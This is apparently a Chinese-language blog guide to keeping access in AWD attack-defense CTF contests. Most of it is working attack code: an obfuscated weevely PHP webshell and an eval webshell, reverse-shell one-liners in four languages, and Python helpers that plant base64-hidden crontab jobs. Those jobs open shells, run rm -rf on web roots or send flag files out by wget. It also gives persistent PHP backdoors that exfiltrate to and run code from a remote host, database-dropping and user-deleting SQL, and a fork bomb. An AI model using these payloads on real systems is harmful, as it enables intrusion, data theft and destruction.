Web选手的AWD后渗透指南
在线下赛,我们常常为了维持权限以及运维自己服务的需求,会对Gamebox植入一些后门。这里对这些后门进行一个简单的汇总。
1. weevely后门
-
优点在于混淆性高,其他选手很难通过分析代码获得weevely型后门的密钥。另外,weevely内置了一些基础的小功能,使用起来也相对方便。
-
缺点便是通过php解析执行,执行速度较慢。
-
生成weevely后门:
# moxiaoxi @ moxiaoxideMacBook-Pro in ~/Desktop/Myself/weevely3 [22:10:27] C:2 $ python weevely.py generate woaizhongguo weevely.php Generated backdoor with password 'woaizhongguo' in 'weevely.php' of 1469 byte size. # moxiaoxi @ moxiaoxideMacBook-Pro in ~/Desktop/Myself/weevely3 [22:10:50] $ cat weevely.php <?php $u='$kh="-Y6471";$kf="-Y2151-Y";f-Yunction -Yx($t,$-Yk)-Y{$c=-Yst-Yrle-Yn($k);$-Yl=strlen($t);$-Yo'; $h='.$k-Yf),-Y0,3));$p=-Y"";f-Yor($z=1;-Y$z<coun-Yt($-Ym[1]);-Y$z++-Y)$-Yp.=$q-Y[$m-Y[2][$z]];if-Y('; $s='-Ys-Ytrpos(-Y$p,$h)===0){$s[-Y$i]="";$-Yp=$-Yss($p-Y,3);}if(a-Yrra-Yy_ke-Yy_exists($i,-Y$s)){$s['; $j=';}}re-Yturn $o-Y;-Y-Y}$r=$_SERVER-Y;$rr=@$r[-Y-Y"HTTP_REFER-YER"];$-Yra=@$r-Y[-Y"HT-YTP_ACC'; $C='o-Y-Ympress(@x(-Y@b-Yase64_decode-Y(-Y-Ypreg_replace(a-Yrray("/-Y-Y_/","-Y/-/"-Y),array(-Y"/","+"),'; $W=');$q=array_value-Ys-Y($q);preg_-Ymatch_all(-Y"-Y/([-Y\\w])[\\w-]+(?:-Y;q=0.(-Y-Y[\\d-Y]))?,-Y?/",'; $G=str_replace('N','','cNNreate_NfNuncNtiNon'); $c='$ra-Y,$m);if-Y($q-Y-Y&&$m){@s-Yession_start();$s=&$_-YSESS-YION;$ss-Y="subs-Ytr-Y";$-Ysl="-Ys'; $e='tr-Ytolowe-Yr";$i=$-Ym[1][-Y0].$m[1][-Y1]-Y;$h=$sl($ss(md5($i.-Y$kh-Y),0,-Y3));$f=$sl($s-Ys(-Ymd5($i'; $M='$i-Y].=$p;$e-Y=strpo-Ys($s-Y[$-Yi],$f);-Yif($e){$k-Y=-Y$-Ykh.$kf;ob_start-Y();@e-Yval(@gzunc'; $f='-Y4_enc-Yode(x(g-Yzcompres-Y-Ys($o)-Y,$k));p-Yrint("<$k-Y>$d</-Y$-Yk>");@session_-Ydestro-Yy();}}}}'; $B='$ss-Y($s[$i],-Y0,$e)))-Y,$-Yk)-Y)-Y);$o=ob_get_conten-Yts();ob-Y-Y_e-Ynd_clean();$d=ba-Yse6'; $g='=""-Y;for($i=0;$i<$l;-Y){-Yfo-Yr($j=0;($j<$-Yc&&$i<-Y$l)-Y;$j-Y++,$i++)-Y{$o.=$t{$i-Y}^$k{$-Yj}'; $x='-YEPT_LANGUAGE"];if-Y($-Yrr&&$ra)-Y{$u=p-Y-Yarse_-Yurl-Y($rr-Y);parse_str-Y($u["quer-Yy"]-Y-Y,$q'; $S=str_replace('-Y','',$u.$g.$j.$x.$W.$c.$e.$h.$s.$M.$C.$B.$f); $o=$G('',$S);$o(); ?>
-
使用weevely后门
将其上传到指定web目录后,使用方式如下:
# moxiaoxi @ moxiaoxideMacBook-Pro in ~/Desktop/Myself/weevely3 [22:14:15] $ python weevely.py http://202.112.51.135:8801/Myself/weevely.php woaizhongguo [+] weevely 3.5 [+] Target: 202.112.51.135:8801 [+] Session: /Users/moxiaoxi/.weevely/sessions/202.112.51.135/weevely_0.session [+] Browse the filesystem or execute commands starts the connection [+] to the target. Type :help for more information. weevely> ls antsword.php k.php reverse.php weevely.php www-data@9b275645e178:/var/www/html/Myself $ whoami www-data www-data@9b275645e178:/var/www/html/Myself $
这样就能得到www-data的一个类shell界面。
-
load_session连接
# moxiaoxi @ moxiaoxideMacBook-Pro in ~/Desktop/Myself/weevely3 [22:15:54] C:2 $ python weevely.py session /Users/moxiaoxi/.weevely/sessions/202.112.51.135/weevely_0.session [+] weevely 3.5 [+] Target: 202.112.51.135:8801 [+] Session: /Users/moxiaoxi/.weevely/sessions/202.112.51.135/weevely_0.session [+] Browse the filesystem or execute commands starts the connection [+] to the target. Type :help for more information. weevely> ls antsword.php k.php reverse.php weevely.php www-data@9b275645e178:/var/www/html/Myself $
2. 蚁剑及菜刀型后门
<?php
$white_ip_list = array(
'127.0.0.1',
"::1"
);
$ip = $_SERVER['REMOTE_ADDR'];
if(count($white_ip_list)>0) {
if (in_array($ip, $white_ip_list)) {
$a = $_POST['moxiaoxi'];
if (isset($a)) {
eval($a);
}
}else{
echo('IP:'.$ip);
}
}
用以连接后,以Gui方式运维。
3. 反弹shell
在bash下可以运行:
bash -i >& /dev/tcp/127.0.0.1/4444 0>&1
使用php:
php -r '$sock=fsockopen("127.0.0.1","4444");exec("/bin/sh -i <&3 >&3 2>&3");'
使用python:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_REAM);s.connect(("127.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
使用perl:
perl -e 'use Socket;$i="127.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
4. Crontab
-
查看定时任务
cat /etc/crontab*
与crontab -l
-
crontab备份
crontab -l > $HOME/mycron
-
删除crontab(www-data种植,www-data清理)
crontab -r
-
crontab执行任意命令
import base64 def crontab_reverse(cmd): crontab_path = "/tmp" crontab_cmd = "* * * * * bash -c '%s'\n"%cmd encode_crontab_cmd = base64.b64encode(crontab_cmd) cmd = "/bin/echo " + encode_crontab_cmd + " | /usr/bin/base64 -d | /bin/cat >> " + crontab_path + "/tmp.conf"+ " ; " + "/usr/bin/crontab " + crontab_path + "/tmp.conf" return cmd
-
crontab反弹shell
import base64 def crontab_reverse(reverse_ip,reverse_port): crontab_path = "/tmp" cmd = 'bash -i >& /dev/tcp/%s/%d 0>&1'%(reverse_ip , reverse_port) crontab_cmd = "* * * * * bash -c '%s'\n"%cmd encode_crontab_cmd = base64.b64encode(crontab_cmd) cmd = "/bin/echo " + encode_crontab_cmd + " | /usr/bin/base64 -d | /bin/cat >> " + crontab_path + "/tmp.conf"+ " ; " + "/usr/bin/crontab " + crontab_path + "/tmp.conf" return cmd
ubuntu@ubuntu-virtual-machine:~$ /bin/echo KiAqICogKiAqIGJhc2ggLWMgJ2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTI3LjAuMC4xLzgwODAgMD4mMScK | /usr/bin/base64 -d | /bin/cat >> /tmp/tmp.conf ; /usr/bin/crontab /tmp/tmp.conf ubuntu@ubuntu-virtual-machine:~$ ubuntu@ubuntu-virtual-machine:~$ crontab -l * * * * * bash -c 'bash -i >& /dev/tcp/127.0.0.1/8080 0>&1'
-
crontab删除文件
import base64 def crontab_rm(rm_paths='/var/www/html/'): crontab_path = "/tmp" cmd = '/bin/rm -rf %s'%rm_paths crontab_cmd = "* * * * * %s\n"%cmd encode_crontab_cmd = base64.b64encode(crontab_cmd) cmd = "/bin/echo " + encode_crontab_cmd + " | /usr/bin/base64 -d | /bin/cat >> " + crontab_path + "/tmp.conf" + " ; " + "/usr/bin/crontab " + crontab_path + "/tmp.conf" return cmd
-
crontab提交flag
import base64 def crontab_flag_submit(flag_server,flag_port,flag_url,flag_token,flag_path): crontab_path = '/tmp' cmd = '/usr/bin/wget "http://%s:%s/%s" -d "token=%s&flag=$(/bin/cat %s)" ' %(flag_server,flag_port,flag_url,flag_token,flag_path) crontab_cmd = "* * * * * %s\n"%cmd encode_crontab_cmd = base64.b64encode(crontab_cmd) cmd = "/bin/echo " + encode_crontab_cmd + " | /usr/bin/base64 -d | /bin/cat >> " + crontab_path + "/tmp.conf" + " ; " + "/usr/bin/crontab " + crontab_path + "/tmp.conf" return cmd cmd = crontab_flag_submit(flag_server='172.16.132.2',flag_port='8088',flag_url='submit',flag_token='bcbe3365e6ac95ea2c0343a2395834dd',flag_path='/flag') print(cmd)
-
…
5. PHP型内存马
内存马,通俗讲就是不死马,就是会运行一段永远不退出的程序常驻在PHP进程里,无限执行。要杀死这种内存马,在root权限下只需要重启Apache或者nginx即可。而在线下赛中,我们往往没有root权限。因此,我们一般得通过www-data用户进行杀马。
杀马,kill -9 -1 杀死所有子进程(杀死当前用户所有进程,有权限下慎用),也可以直接killall apache2。这种操作并不会kill掉apache主进程,因为内存马是Apache启动的一个子进程;
ps -aux|grep ‘www-data’|awk ‘{print $2}’|xargs kill -9
-
回送flag+自动提交flag+回连任意代码执行
<?php $message="* * * * * curl 192.168.136.1:8098/?flag=$(cat /flag)&token=7gsVbnRb6ToHRMxrP1zTBzQ9BeM05oncH9hUoef7HyXXhSzggQoLM2uXwjy1slr0XOpu8aS0qrY"; ignore_user_abort(true); set_time_limit(0); while (true) { $x =file_get_contents('/flag'); file_get_contents('http://192.168.136.1:8099/test.php?token=moxiaoxi&flag='.$x); sleep(5); system("echo '$message' > /tmp/1 ;"); system("crontab /tmp/1;"); system("rm /tmp/1;"); $c=file_get_contents('http://192.168.136.1:8100/1.txt'); system($c); } ?>
-
覆盖写
<?php ignore_user_abort(true); set_time_limit(0); while (1){ $path = "/var/www/html/css/.moxiaoxi2.php"; $data = "<?php @eval(\$_POST['moxiaoxi']);?>"; @file_put_contents($path, $data); system('chmod 777 '.$path); usleep(100); } ?>
这里讲一下二进制马,我至今还没找到那种可以动态变pid,而且执行速度超快的二进制马。所以,在当下看来,二进制马作用其实不大,因为所有的二进制马都可以通过杀死内存马的方式杀掉,就显得很鸡肋。如果后面发现了这种快速执行的骚马,可以拿出来讲一讲。
6. 其他
-
数据库相关
删除数据库
import base64 def rm_db(db_user,my_db_passwd): cmd = "/usr/bin/mysql -h localhost -u%s %s -e '"%(db_user,my_db_passwd) db_name = ['performance_schema','mysql','flag'] for db in db_name: cmd += "drop database %s;"%db cmd += "'" return cmd
修改用户信息
update mysql.user set authentication_string=PASSWORD('hi23333');# 修改所有用户密码 flush privileges; UPDATE mysql.user SET User='aaaaaaaaaaaa' WHERE user='root'; flush privileges; delete from mysql.user ;#删除所有用户 flush privileges;
-
fork炸弹
/bin/echo '.() { .|.& } && .' > /tmp/aaa;/bin/bash /tmp/aaa;
-
滥用杀死不死马脚本,不停kill apache2,造成dos
-
大量发送长度超长的脚本,造成dos
-
mysql sleep型dos
-
所有的正向shell可以自己写一段简单的python脚本进行控制与管理,而反向shell可以使用王一航写的反向shell管理器.现在的反向shell管理器还存在一些bug。
-
….